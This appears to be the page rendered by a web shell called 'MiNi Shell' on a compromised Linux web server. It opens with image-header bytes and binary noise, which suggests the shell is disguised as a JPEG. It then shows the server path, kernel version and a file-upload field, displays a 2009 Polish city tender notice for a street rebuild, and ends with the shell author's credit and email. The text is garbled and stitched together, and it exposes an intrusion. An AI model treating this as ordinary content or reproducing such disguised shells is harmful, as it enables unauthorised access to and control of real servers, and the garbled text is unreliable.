JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090916/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090916/320394-N-2009.html

<p class="kh_header"><b>Gorzów Wielkopolski: Przebudowa ul.Mickiewicza</b><br>
<b>Numer ogłoszenia: 320394 - 2009; data zamieszczenia: 16.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Gorzów Wlkp. , ul. Sikorskiego 3-4, 66-400 Gorzów Wielkopolski, woj. lubuskie, tel. 095 7355576, faks 095 7355612.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.gorzow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa ul.Mickiewicza.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> W ramach zadania przewiduje się:
    a) rozebranie:
       - nawierzchni chodników i zjazdów -  1968,63m2,
       - ścieków przykrawężnikowych z kostki kamiennej - 37,00m2, 
       - ścieków z elementów kamiennych i betonowych -  81,75m 
       - krawężników betonowych i kamiennych wraz z ławą betonową z oporem -  501,50m,
       - obrzeży betonowych - 284,95m,
    b) frezowanie nawierzchni bitumicznej jezdni -2 462,00m2, 
    c) ustawienie:
       - krawężników betonowych 15x30cm na podsypce cementowo- piaskowej i ławie betonowej z oporem  -  6,00m,
       - krawężników kamiennych (z rozbiórki) na podsypce cementowo-piaskowej i ławie betonowej z oporem -  495,50m,
       - obrzeży betonowych 8x30cm na podsypce cementowo-piaskowej - 295,10m,
    d) regulację krawężników kamiennych - 14,30m,
    e) wykonanie:
       - koryta  -  378,78m2, 
       - podbudowy z kruszywa łamanego stabilizowanego mechanicznie - 330,90m2, 
       - podbudowy betonowej z B-10 - 47,88m2,
       - profilowanie  i  zagęszczenie  podłoża -1650,25m2,
       - nawierzchni chodników z kostki brukowej betonowej gr 8 cm na podsypce cementowo-piaskowej -  1 750,15m2, 
       - warstwy wiążącej z masy mineralno-asfaltowej o grubości 6cm po zagęszczeniu -  2 499,00m2,  
       - warstwy ścieralnej z masy mineralno-asfaltowej o grubości 5cm po  zagęszczeniu -  2 499,00m2, 
     f) regulację wpustów deszczowych i studzienek urządzeń podziemnych -  77,00szt..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.11.00.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 11.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 7000 zł (słownie: siedem tysięcy zł)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy którzy:
    1) nie podlegają wykluczeniu z postępowania na podstawie art. 24  ustawy  Prawo zamówień publicznych,
    2) spełniają warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych,
    3) wykonali w ciągu ostatnich pięciu lat  przed dniem wszczęcia postępowania,  a  jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co  najmniej:
 jedno  zamówienie  o  wartości  nie  mniejszej  niż  250 000,00 PLN  brutto  lub  dwa  o   wartości  nie  mniejszej niż 125 000,00 PLN brutto każde, polegające na wykonaniu nawierzchni jezdni z masy  mineralno-asfaltowej w ramach budowy, przebudowy lub remontu drogi i załączą dokument potwierdzający, że roboty te zostały wykonane  należycie (np. referencje).
    4) dysponują  lub  mają  zapewniony  dostęp  (przez  dzierżawę,  wynajem, umowę  kupna  lub  w  inny  sposób)  do  co najmniej  jednej-jednego:
          -  rozkładarki mas bitumicznych,
          -  frezarki do nawierzchni bitumicznych, 
          -  samochodu samowyładowczego,
          -  walca statycznego samojezdnego,
          -  walca wibracyjnego.
    5) posiadają ubezpieczenie  od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na  kwotę  nie  mniejszą  niż  200.000,00 PLN  na  okres  wykonywania  zamówienia, a  jeżeli okres  na  który opiewa  polisa  
jest  krótszy  -  złożą oświadczenie,  iż  ubezpieczenie  będzie przedłużane  i obejmowało będzie  okres  wykonywania  zamówienia.

Spełnianie  warunków udziału w niniejszym  postępowaniu Zamawiający  oceniał  będzie  na  podstawie oświadczeń  i  dokumentów  złożonych do oferty zgodnie z formułą spełnia-nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1) Oświadczenie Wykonawcy, że spełnia warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych.
2) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do  ewidencji działalności gospodarczej, jeżeli  odrębne  przepisy   wymagają  wpisu  do  rejestru  lub   zgłoszenia  do  ewidencji   działalności  gospodarczej,       wystawione nie wcześniej niż  6 miesięcy  przed upływem terminu składania ofert. W  przypadku  spółek cywilnych  zaświadczenia o wpisie do ewidencji działalności gospodarczej składają wszyscy wspólnicy.
3) Wykaz wykonanych   w  okresie ostatnich  pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie z  podaniem  ich  wartości  oraz daty  i miejsca wykonania oraz  załączeniem dokumentów  potwierdzających (np. referencje), że zostały one wykonane należycie.
4) Jeżeli wystąpią  podwykonawcy,  wykaz  części zamówienia zleconych podwykonawcy.
5) Wykaz  sprzętu.
6) Pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego w celu wykonania zamówienia, jeżeli Wykonawca wskazał sprzęt techniczny, którym nie dysponuje lecz będzie dysponował,
7) Polisę  lub  inny  dokument  ubezpieczenia potwierdzający, że wykonawca  jest  ubezpieczony od odpowiedzialności cywilnej  w  zakresie  prowadzonej działalności  gospodarczej  na kwotę nie mniejszą  niż  200.000,00 PLN na okres wykonywania zamówienia, a jeżeli okres na który opiewa polisa jest krótszy-polisę lub inny dokument ubezpieczenia oraz oświadczenie,  iż  ubezpieczenie  będzie przedłużane  i obejmowało będzie okres wykonywania  zamówienia.

W  przypadku  oferty  składanej  przez  Wykonawcę,  który  ma  siedzibę lub miejsce zamieszkania poza terytorium RP,  zamiast dokumentu, o którym mowa  w w punktcie 2 winien on złożyć dokumenty, wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
- nie otwarto jego likwidacji ani nie ogłoszono upadłości.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się takich dokumentów, można je zastąpić dokumentem zawierającym oświadczenie złożone przed właściwym organem sądowym, administracyjnym, organem samorządu zawodowego lub gospodarczego albo przed notariuszem kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Dokument taki winien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.gorzow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Gorzowa Wlkp. ul.Sikorskiego 3-4, 66-400 Gorzów Wlkp. pok. 315. SIWZ w wersji wydrukowanej - płatna 35,00 PLN. Wersja elektroniczna bezpłatna do pobrania ze strony www.bip.gorzow.pl..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.10.2009 godzina 11:00, miejsce: Urząd Miasta Gorzowa Wlkp. Wydział Dróg i Transportu Publicznego ul. Okólna 2  pokój 101..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com